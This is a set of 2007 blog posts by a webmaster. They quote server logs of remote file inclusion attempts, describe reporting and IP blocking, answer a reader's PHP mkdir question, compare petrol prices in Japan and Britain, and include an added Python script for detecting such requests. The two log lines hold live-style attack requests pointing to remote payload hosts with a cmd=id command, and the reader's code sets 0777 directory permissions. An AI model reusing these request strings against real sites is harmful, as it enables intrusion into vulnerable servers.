After the mention in Script Kiddies 2, and after being given a report that one of their account holders had put up a site-defacing script, the free hosting site phpnet.us cancelled the damaging account.
It is a real pity that so many of their competitors do not act equally responsibly.


The logs showed up another attempted exploit, very similar to the one in New Hack Attempt:

88.242.239.182 - - [27/May/2007:18:40:29 +0100] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0" 403 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

phpnet.us, which provides the hosting, does not give a direct way for unregistered users to contact them regarding abuse, but I have used the registered email address at hostorgadmin@googlemail.com to let phpnet.us know that their service is being used by script kiddies.

The originating IP address belongs to the familiar TurkTelekom, who seem to have become the home of some script kiddies.

inetnum: 88.242.64.0 - 88.242.255.255
netname: TurkTelekom
descr: TT ADSL-alcatel dynamic_aci

As usual, their abuse account bounced the complaint.
It looks like another of their IP ranges will have to be blocked.


In the feedback form for dragonthoughts.com, I found the following comments today:

Hi, I have a problem in the mkdir() function in PHP. The following code
works in WAMP server, but when I tried uploading it to a Fedora Core
server, it couldn't create the directory anymore.

$query0 = "SELECT * FROM request";
$result0 = mysql_query($query0) or die("Query 0 failed ");
while ($line = mysql_fetch_array($result0)) {
    if ($line['finish_status'] == 'ok') {
        $content++;
        //break;
    }
}

$dir = $_SERVER['DOCUMENT_ROOT'].'/quotations/'.$content;
$check = mkdir($dir, 0777, TRUE);

The only problem is that the requester didn’t give a return email address! They did find this site through a link from Webmaster world.

My personal guess is that they are running PHP in safe mode on their Fedora Core, and I would have happily emailed them to assist, if they had given me a chance!


After a week, genchackers is still being hosted and still serving scripts that can break security on badly configured sites.


The following hack attempt appeared in the dragonthoughts logs yesterday.

88.233.150.109 - - [21/May/2007:21:39:02 +0100] "GET /index.php?mosConfig_absolute_path=http://genchackers.net/tool20.dat?&list=1&cmd=id HTTP/1.0" 403 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Presumably it is a script kiddie who has no idea how old the exploit is, but these reports of a year ago will provide an idea:

The listed abuse reporting email address bounced my complaint for the originator’s IP range, 88.233.0.0 - 88.233.255.255:

netname: TurkTelekom
descr: TT ADSL-alcatel_gay

So, all of its IP ranges will have their access blocked.

As will the range 212.175.205.0 - 212.175.205.255, which is hosting genchackers.net.

The hacker script that is hosted at genchackers.net was ripped off from http://georgiaeliteallstars.com although they seem to have taken the script down now.

As it stands, the script can’t work for the kiddie that downloaded it, but I don’t think it is appropriate or ethical to explain how to fix it!
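
The two log entries quoted on this page share one tell: a query parameter whose value is itself a remote URL. As an added example (not code from the original posts), this Python script flags such requests in Apache combined-format logs and groups them by source address and payload host; the function names and the last two sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache combined log: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# A query parameter whose value is itself a URL is the remote-include tell.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_includes(lines):
    """Yield (source_ip, status, parameter, payload_host) for each suspect request."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in combined format
        query = urlsplit(m['target']).query
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = value.strip()
            if REMOTE_RE.match(value):
                yield m['ip'], int(m['status']), name, urlsplit(value).hostname

def summarize(lines):
    """Group findings: which sources to block and which payload hosts to report."""
    sources, payload_hosts = defaultdict(int), defaultdict(set)
    for ip, _status, _param, host in find_remote_includes(lines):
        sources[ip] += 1
        payload_hosts[host].add(ip)
    return dict(sources), {h: sorted(ips) for h, ips in payload_hosts.items()}

# The first two lines are the entries quoted on this page; the last two are constructed.
SAMPLE_LOG = [
    '88.242.239.182 - - [27/May/2007:18:40:29 +0100] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0" 403 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    '88.233.150.109 - - [21/May/2007:21:39:02 +0100] "GET /index.php?mosConfig_absolute_path=http://genchackers.net/tool20.dat?&list=1&cmd=id HTTP/1.0" 403 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    '192.0.2.10 - - [27/May/2007:18:41:02 +0100] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/May/2007:18:42:10 +0100] "GET /index.php?page=http%3A%2F%2Fpayload.example%2Fx.txt HTTP/1.1" 403 283 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    sources, hosts = summarize(SAMPLE_LOG)
    for ip, count in sources.items():
        print(f"{ip}: {count} remote-include attempt(s)")
    for host, ips in hosts.items():
        print(f"payload host {host}: requested by {', '.join(ips)}")
```

Legitimate parameters such as login return URLs can also carry a URL, so treat the findings as leads and allow-list the parameter names a site really uses.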


In today’s Asahi Shimbun, there is an article bemoaning the rise in petrol prices in Japan. It explains that due to the weak Yen and rising crude oil prices, “regular gasoline now costs 137 yen per liter”. At current exchange rates, this is equivalent to approximately 57p per litre in Britain.

Currently, in Britain, petrol costs around 92p per litre, more than 1.5 times that in Japan. It seems that despite significant rises in petrol costs, the Japanese still get it much cheaper.

As was noted in the article, there is the weak Yen to be considered, so this comparison doesn’t show what the price means in real terms to a normal consumer. To take this into account, we should adjust the figures for the average national wage:

Country | Average wage in 2006 (£) | Source
Japan   | 17,000                   | Japan Times, Feb 2007
UK      | 23,244                   | National Statistics online

Using these figures as a basis, we can see that with a year’s wages, an average Japanese wage earner could still buy approximately 29,824 litres of fuel while a British person could buy only 25,265 litres of petrol for the same year’s work.

This shows that, despite a weak Yen and a rise in crude oil prices, in terms of average wages, petrol in Britain is still 18% more expensive than in Japan.